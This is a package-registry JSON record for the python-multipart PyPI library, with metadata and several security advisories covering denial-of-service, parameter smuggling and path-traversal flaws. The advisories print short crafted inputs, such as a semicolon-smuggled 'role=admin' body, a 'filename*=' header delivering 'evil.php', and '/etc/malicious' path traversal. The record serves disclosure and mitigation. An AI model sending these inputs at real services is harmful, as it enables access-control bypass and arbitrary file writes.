{"id":2888490,"name":"python-multipart","ecosystem":"pypi","description":"A streaming multipart parser for Python","homepage":"https://github.com/Kludex/python-multipart","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Kludex/python-multipart","keywords_array":[],"namespace":null,"versions_count":32,"first_release_published_at":"2013-03-26T00:49:56.000Z","latest_release_published_at":"2026-06-04T16:18:57.000Z","latest_release_number":"0.0.32","last_synced_at":"2026-06-17T07:00:26.564Z","created_at":"2022-04-10T12:21:20.184Z","updated_at":"2026-06-17T07:00:26.565Z","registry_url":"https://pypi.org/project/python-multipart/","install_command":"pip install python-multipart --index-url https://pypi.org/simple","documentation_url":"https://kludex.github.io/python-multipart/","metadata":{"funding":null,"documentation":"https://kludex.github.io/python-multipart/","classifiers":["Development Status :: 5 - Production/Stable","Environment :: Web Environment","Intended Audience :: Developers","License :: OSI Approved :: Apache Software License","Operating System :: OS Independent","Programming Language :: Python :: 3","Programming Language :: Python :: 3 :: Only","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Topic :: Software Development :: Libraries :: Python Modules"],"normalized_name":"python-multipart","project_status":null},"repo_metadata":{"id":7657597,"uuid":"9018833","full_name":"Kludex/python-multipart","owner":"Kludex","description":"A streaming multipart parser for Python.","archived":false,"fork":false,"pushed_at":"2024-09-29T08:12:35.000Z","size":977,"stargazers_count":313,"open_issues_count":12,"forks_count":54,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-09-29T21:37:57.694Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://multipart.fastapiexpert.com/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kludex.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-03-25T23:50:12.000Z","updated_at":"2024-09-29T16:13:01.000Z","dependencies_parsed_at":"2024-01-22T12:53:27.968Z","dependency_job_id":"fc1cdb71-6e24-4300-a7bd-d68a910ccf21","html_url":"https://github.com/Kludex/python-multipart","commit_stats":{"total_commits":152,"total_committers":23,"mean_commits":6.608695652173913,"dds":0.6973684210526316,"last_synced_commit":"8b85d35fd79869766f678cbdc27bfaebe37b5527"},"previous_names":["kludex/python-multipart","andrew-d/python-multipart"],"tags_count":7,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kludex","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":219877080,"owners_count":16554826,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Kludex","name":"Marcelo Trylesinski","uuid":"7353520","kind":"user","description":"Software Engineer @ Pydantic ๐Ÿ‡ง๐Ÿ‡ท๐Ÿ‡บ๐Ÿ‡พ๐Ÿ‡ฎ๐Ÿ‡น\r\nUvicorn \u0026 Starlette maintainer ๐Ÿฆ„๐ŸŒŸ\r\nFastAPI Expert โšก","email":"","website":"https://www.fastapiexpert.com/","location":"Utrecht, Netherlands","twitter":"marcelotryle","company":"@encode @pydantic","icon_url":"https://avatars.githubusercontent.com/u/7353520?u=62adc405ef418f4b6c8caa93d3eb8ab107bc4927\u0026v=4","repositories_count":193,"last_synced_at":"2024-05-20T14:06:26.952Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/Kludex","funding_links":["https://github.com/sponsors/Kludex"],"total_stars":4898,"followers":1576,"following":3,"created_at":"2022-11-14T06:44:58.525Z","updated_at":"2024-05-20T14:06:39.014Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kludex","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kludex/repositories"},"tags":[{"name":"0.0.9","sha":"3035c45b87a4a1bcb857e17f0ecbc4696ea75e47","kind":"commit","published_at":"2024-02-10T13:30:24.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.9","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.9/manifests"},{"name":"0.0.8","sha":"8ce342cd9ac03fe238c24d68cffaf25a7ea0371a","kind":"commit","published_at":"2024-02-09T21:52:41.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.8","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.8/manifests"},{"name":"0.0.7","sha":"c83e6da1a3a6ed002ebb22138baa1664134d540c","kind":"commit","published_at":"2024-02-03T12:03:47.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.7","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.7/manifests"},{"name":"0.0.6","sha":"4ccfb3a0f20990c1ed682727262b2560707b81df","kind":"commit","published_at":"2023-02-27T16:37:18.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.6","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.6/manifests"},{"name":"0.0.5","sha":"f1a275e73763d16a9dba45e2bd568860302786bd","kind":"commit","published_at":"2018-10-12T08:24:19.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.5","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.5/manifests"},{"name":"0.0.4","sha":"e81dfcb954626e8d68a7b340d1e10bf585e491b4","kind":"commit","published_at":"2017-05-20T21:14:06.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.4","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.4/manifests"},{"name":"0.0.2","sha":"54b19103bea5427e3d2cbe65e406887005e4b54b","kind":"commit","published_at":"2013-11-09T07:24:48.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.2","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.2/manifests"}]},"repo_metadata_updated_at":"2024-09-30T05:09:47.106Z","dependent_packages_count":703,"downloads":359610939,"downloads_period":"last-month","dependent_repos_count":12240,"rankings":{"downloads":0.11223066545734472,"dependent_repos_count":0.07888539134013704,"dependent_packages_count":0.04172922875239133,"stargazers_count":5.048447100797413,"forks_count":6.6945893854269345,"docker_downloads_count":0.46130804935862746,"average":2.072864970188808},"purl":"pkg:pypi/python-multipart","advisories":[{"uuid":"GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU","url":"https://github.com/advisories/GHSA-5rvq-cxj2-64vf","title":"python-multipart: Quadratic-time querystring parsing with semicolon separators causes CPU denial of service","description":"### Summary\n\nWhen parsing `application/x-www-form-urlencoded` bodies, `QuerystringParser` located the field separator with a two step lookup: it first scanned the entire remaining buffer for `\u0026`, and only when no `\u0026` existed anywhere ahead did it fall back to scanning for `;`. For a body that uses `;` as the separator and contains no `\u0026`, every field iteration performed a full failed `\u0026` scan over the entire remaining buffer before locating the nearby `;`. With N semicolon separated fields in a chunk of size B, this yields O(B^2) byte comparisons per chunk.\n\nAn attacker can submit a small crafted body of the form `a;a;a;...` and cause the parser to spend seconds of CPU per request. A handful of concurrent requests can exhaust worker processes.\n\n### Details\n\nIn `python_multipart/multipart.py`, both the `FIELD_NAME` and `FIELD_DATA` states located the next separator like this:\n\n```python\nsep_pos = data.find(b\"\u0026\", i)\nif sep_pos == -1:\n sep_pos = data.find(b\";\", i)\n```\n\n`data.find(b\"\u0026\", i)` scans from `i` to the end of the buffer and returns `-1` only when there is no `\u0026` anywhere in the remainder. For a `;` separated body with no `\u0026`, this failed full buffer scan repeats once per field, making parsing quadratic in the body length.\n\nFor example, a 1 MiB url encoded body consisting of `a;` repeated ~500,000 times, submitted with `Content-Type: application/x-www-form-urlencoded`, causes the parser to perform on the order of 10^11 byte comparisons, consuming several seconds of CPU for a single request. Cost scales quadratically with chunk size.\n\nThe parser is reachable through the public `QuerystringParser` class and through the high level `FormParser`, `create_form_parser`, and `parse_form` APIs for url encoded bodies. It is also the parser Starlette and FastAPI use for `application/x-www-form-urlencoded` request bodies via `request.form()`.\n\n### Impact\n\nUncontrolled CPU consumption (denial of service). Parsing is synchronous, so a single small crafted form body occupies the handling worker for seconds, blocking any other work on that worker until parsing finishes. Sustained concurrent requests keep workers continuously busy, degrading or denying service.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.30` or later, which treats only `\u0026` as a field separator (per the [WHATWG URL standard](https://url.spec.whatwg.org/#urlencoded-parsing)) using a single bounded scan, making parsing linear in the body length.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-15T20:24:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-5rvq-cxj2-64vf","https://github.com/advisories/GHSA-5rvq-cxj2-64vf"],"source_kind":"github","identifiers":["GHSA-5rvq-cxj2-64vf","CVE-2026-53539"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.902Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.30","vulnerable_version_range":"\u003c 0.0.30"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT","url":"https://github.com/advisories/GHSA-v9pg-7xvm-68hf","title":"python-multipart: Negative Content-Length in parse_form buffers the entire body in memory","description":"### Summary\n\n`parse_form()` did not validate the `Content-Length` header before using it to bound its chunked read of the request body. A negative `Content-Length` turned the bounded read into a read-until-EOF, so the entire body was loaded into memory in a single read instead of in fixed-size chunks.\n\n### Details\n\n`parse_form()` reads the input stream in chunks, never reading more than the remaining `Content-Length` at a time. The per-chunk size is computed as `min(content_length - bytes_read, chunk_size)`. The header value was parsed to an integer without checking its sign, so a `Content-Length` of `-1` made this expression negative, and `input_stream.read(-1)` reads until end of stream. The intended bounded, chunked read therefore collapsed into a single unbounded read of the whole stream. The amount read is still bounded by what the client actually sends.\n\n### Impact\n\nThis only affects code that calls `parse_form()` directly with a `Content-Length` header taken from attacker-controlled input and without normalizing a negative value first. No known package is affected:\n\n* Starlette and FastAPI drive `MultipartParser` directly from the ASGI `receive()` stream and do not call `parse_form()`.\n* Known `parse_form()` consumers either do not forward `Content-Length` to it, recompute it from the already-read body, or run behind a layer (such as Werkzeug) that normalizes a negative `Content-Length` to `0`.\n\nThe realistic exposure is limited to bespoke WSGI or `http.server` handlers that forward raw client headers into `parse_form()`. In that case a crafted request buffers the body in memory at once, degrading availability under concurrent requests rather than causing a complete denial of service.\n\n### Mitigation\n\nUpgrade to version `0.0.31` or later, which rejects a negative `Content-Length` with a `ValueError` before reading the stream.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-06-15T20:23:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-v9pg-7xvm-68hf","https://github.com/advisories/GHSA-v9pg-7xvm-68hf"],"source_kind":"github","identifiers":["GHSA-v9pg-7xvm-68hf","CVE-2026-53540"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.903Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.31","vulnerable_version_range":"\u003c 0.0.31"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS","url":"https://github.com/advisories/GHSA-6jv3-5f52-599m","title":"python-multipart: Semicolon treated as querystring field separator enables parameter smuggling","description":"### Summary\n\n`QuerystringParser` treated `;` as a field separator in `application/x-www-form-urlencoded` bodies, in addition to `\u0026`. The [WHATWG URL standard](https://url.spec.whatwg.org/#urlencoded-parsing), modern browsers, and Python's `urllib.parse` (since the CVE-2021-23336 fix) treat only `\u0026` as a separator. This creates a parser differential: the same bytes are tokenized into different fields than a WHATWG compliant intermediary would produce, allowing an attacker to smuggle extra form fields past an upstream body inspecting component.\n\n### Details\n\nIn `python_multipart/multipart.py`, the `FIELD_NAME` and `FIELD_DATA` states located the next separator by scanning for `\u0026` and, failing that, for `;`:\n\n```python\nsep_pos = data.find(b\"\u0026\", i)\nif sep_pos == -1:\n sep_pos = data.find(b\";\", i)\n```\n\nAs a result, `;` acted as a field boundary. Because the fallback only triggered when no `\u0026` remained in the current chunk, tokenization also depended on unrelated bytes later in the buffer and on how the body was split across `write()` calls. This is the same class of issue as CVE-2021-23336 in CPython's `urllib.parse`.\n\nFor example, a body inspecting WAF or gateway that follows the WHATWG rule (only `\u0026` separates fields) receives:\n\n```\nrole=user\u0026x=;role=admin\n```\n\nThe upstream parses two fields, `role=user` and `x=\";role=admin\"`, sees a benign `role=user`, and forwards the request. `QuerystringParser` parsed the same bytes as three fields: `role=\"user\"`, `x=\"\"`, and `role=\"admin\"`. The application (for example via Starlette/FastAPI `request.form()`, where the last value wins) then received `role=admin`, a value the upstream validator never saw.\n\nThe parser is reachable through the public `QuerystringParser` class, the high level `FormParser`, `create_form_parser`, and `parse_form` APIs, and Starlette/FastAPI `request.form()` for url encoded bodies.\n\n### Impact\n\nInterpretation conflict / HTTP parameter pollution. An attacker can smuggle extra or overriding form fields past an upstream component that applies the WHATWG separator rule, reaching the backend with parameters the intermediary did not observe.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.30` or later, which treats only `\u0026` as a field separator per the [WHATWG URL standard](https://url.spec.whatwg.org/#urlencoded-parsing). `;` is parsed as ordinary field data, matching `urllib.parse`, browsers, and other compliant parsers.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-06-15T20:22:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-6jv3-5f52-599m","https://github.com/advisories/GHSA-6jv3-5f52-599m"],"source_kind":"github","identifiers":["GHSA-6jv3-5f52-599m","CVE-2026-53538"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.904Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.30","vulnerable_version_range":"\u003c 0.0.30"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR","url":"https://github.com/advisories/GHSA-vffw-93wf-4j4q","title":"python-multipart: Content-Disposition parameter smuggling via RFC 2231/5987 extended parameters","description":"### Summary\n\n`parse_options_header` parsed `Content-Disposition` (and `Content-Type`) headers with [`email.message.Message`](https://docs.python.org/3/library/email.compat32-message.html#email.message.Message), which transparently applies [RFC 2231](https://datatracker.ietf.org/doc/html/rfc2231)/[5987](https://datatracker.ietf.org/doc/html/rfc5987) decoding. The extended parameter syntax (`filename*=charset'lang'value`, `name*=...`, and the `filename*0`/`filename*1` continuation form) is decoded and surfaced under the bare `filename`/`name` key, and overrides the plain parameter when both are present. [RFC 7578 ยง4.2](https://datatracker.ietf.org/doc/html/rfc7578#section-4.2) explicitly forbids the `filename*` form in `multipart/form-data`.\n\nComponents that follow RFC 7578, or that do not implement RFC 2231/5987 decoding for `multipart/form-data` (WAFs, proxies, gateways), may interpret such a header differently. An attacker can exploit that difference to smuggle a different field name or filename past an upstream inspector to the backend.\n\n### Details\n\nGiven both a plain and an extended parameter, the extended value won. For example:\n\n```\nContent-Disposition: form-data; name=\"comment\"; name*=utf-8''role\n```\n\nAn inspector following RFC 7578 sees the field `comment`, while the returned value was `name=role`. The same applies to filenames:\n\n```\nContent-Disposition: form-data; name=\"upload\"; filename=\"safe.txt\"; filename*=utf-8''evil.php\n```\n\nThe inspector sees `safe.txt`, while the returned value was `filename=evil.php`. Continuation parameters (`filename*0`, `filename*1`, and so on) were likewise reassembled into a `filename` invisible to a plain `filename=` match, and percent encoded sequences in the extended value were decoded (so `..%2F`, `%00`, and similar appeared in the returned filename).\n\nThis affects the high level `parse_options_header`, `FormParser`, `create_form_parser`, and `parse_form` APIs, and reaches Starlette/FastAPI through `request.form()`, where the smuggled value is exposed as the form field name or [`UploadFile.filename`](https://www.starlette.io/requests/#request-files).\n\n### Impact\n\nThis is an interpretation conflict ([CWE-436](https://cwe.mitre.org/data/definitions/436.html)) with other `multipart/form-data` parsers. An attacker able to submit `multipart/form-data` can present a different field name or filename to an upstream body inspecting component than the one delivered to the application. Concrete consequences depend on how the application uses these values, and may include bypassing a field name or filename based access/upload control, or, for an application that builds filesystem paths from the parsed filename without sanitization, path traversal via decoded `..%2F` sequences. Decoded control bytes such as `%00` can likewise cause confusion between an upstream validator and the backend. The `File` class applies `os.path.basename`, so file writing through it is not directly affected.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.30` or later, which ignores RFC 2231/5987 extended parameters (`name*`, `filename*`, and their continuations) so the plain `name`/`filename` parameter remains authoritative. RFC 7578 ยง4.2 forbids `filename*` for `multipart/form-data`; `name*` and the continuation forms are dropped for the same reason, since they are not valid `multipart/form-data` parameters either.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-06-15T20:20:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-vffw-93wf-4j4q","https://github.com/advisories/GHSA-vffw-93wf-4j4q"],"source_kind":"github","identifiers":["GHSA-vffw-93wf-4j4q","CVE-2026-53537"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.906Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.30","vulnerable_version_range":"\u003c 0.0.30"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU","url":"https://github.com/advisories/GHSA-pp6c-gr5w-3c5g","title":"python-multipart has Denial of Service via unbounded multipart part headers","description":"### Summary\n\n`python-multipart` has a denial of service vulnerability in multipart part header parsing. When parsing `multipart/form-data`, `MultipartParser` previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion.\n\n### Impact\n\nApplications that parse attacker-controlled `multipart/form-data` with affected versions of `python-multipart` can experience CPU exhaustion. ASGI applications using Starlette, FastAPI, or other frameworks that invoke `python-multipart` may have worker or event-loop delays while processing malicious upload requests.\n\n### Details\n\nThe affected parser states are `HEADER_FIELD_START`, `HEADER_FIELD`, `HEADER_VALUE_START`, `HEADER_VALUE`, and `HEADER_VALUE_ALMOST_DONE`. The issue can be triggered by:\n\n- A multipart part with an oversized individual header value.\n- A multipart part with many repeated header lines or an unterminated header block.\n\nBoth variants are addressed by enforcing default parser limits for maximum header count and maximum header size.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.27` or later.\n\nIf upgrading is not immediately possible, reduce exposure by enforcing request body size limits at the server, proxy, or framework layer. This is only a mitigation; affected versions of `python-multipart` still parse multipart part headers without the default header count and header size limits.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-06T21:56:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g","https://nvd.nist.gov/vuln/detail/CVE-2026-42561","https://github.com/advisories/GHSA-pp6c-gr5w-3c5g"],"source_kind":"github","identifiers":["GHSA-pp6c-gr5w-3c5g","CVE-2026-42561"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T22:00:07.920Z","updated_at":"2026-06-16T12:00:53.416Z","epss_percentage":0.00074,"epss_percentile":0.22549,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.27","vulnerable_version_range":"\u003c 0.0.27"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk","url":"https://github.com/advisories/GHSA-mj87-hwqh-73pj","title":"python-multipart affected by Denial of Service via large multipart preamble or epilogue data","description":"### Summary\n\nA denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections.\n\n### Details\n\nTwo inefficient multipart parsing paths could be abused with attacker-controlled input.\n\nBefore the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary.\n\n### Impact\n\nAn attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. This issue degrades availability but does not typically result in a complete denial of service for the entire application.\n\n### Mitigation\n\nUpgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-15T19:45:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj","https://github.com/Kludex/python-multipart/releases/tag/0.0.26","https://nvd.nist.gov/vuln/detail/CVE-2026-40347","https://github.com/advisories/GHSA-mj87-hwqh-73pj"],"source_kind":"github","identifiers":["GHSA-mj87-hwqh-73pj","CVE-2026-40347"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-15T20:00:09.550Z","updated_at":"2026-06-14T01:01:05.222Z","epss_percentage":0.00022,"epss_percentile":0.06162,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.26","vulnerable_version_range":"\u003c 0.0.26"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg","url":"https://github.com/advisories/GHSA-wp53-j4wj-2cfg","title":"Python-Multipart has Arbitrary File Write via Non-Default Configuration","description":"### Summary\n\nA Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename.\n\n### Details\n\nWhen `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fname)`. Due to the behavior of `os.path.join()`, if the filename begins with a `/`, all preceding path components are discarded:\n\n```py\nos.path.join(\"/upload/dir\", \"/etc/malicious\") == \"/etc/malicious\"\n```\n \nThis allows an attacker to bypass the intended upload directory and write files to arbitrary paths. \n \n#### Affected Configuration \n \nProjects are only affected if all of the following are true: \n- `UPLOAD_DIR` is set\n- `UPLOAD_KEEP_FILENAME` is set to True\n- The uploaded file exceeds `MAX_MEMORY_FILE_SIZE` (triggering a flush to disk)\n\nThe default configuration is not vulnerable. \n \n#### Impact \n \nArbitrary file write to attacker-controlled paths on the filesystem. \n \n#### Mitigation \n \nUpgrade to version 0.0.22, or avoid using `UPLOAD_KEEP_FILENAME=True` in project 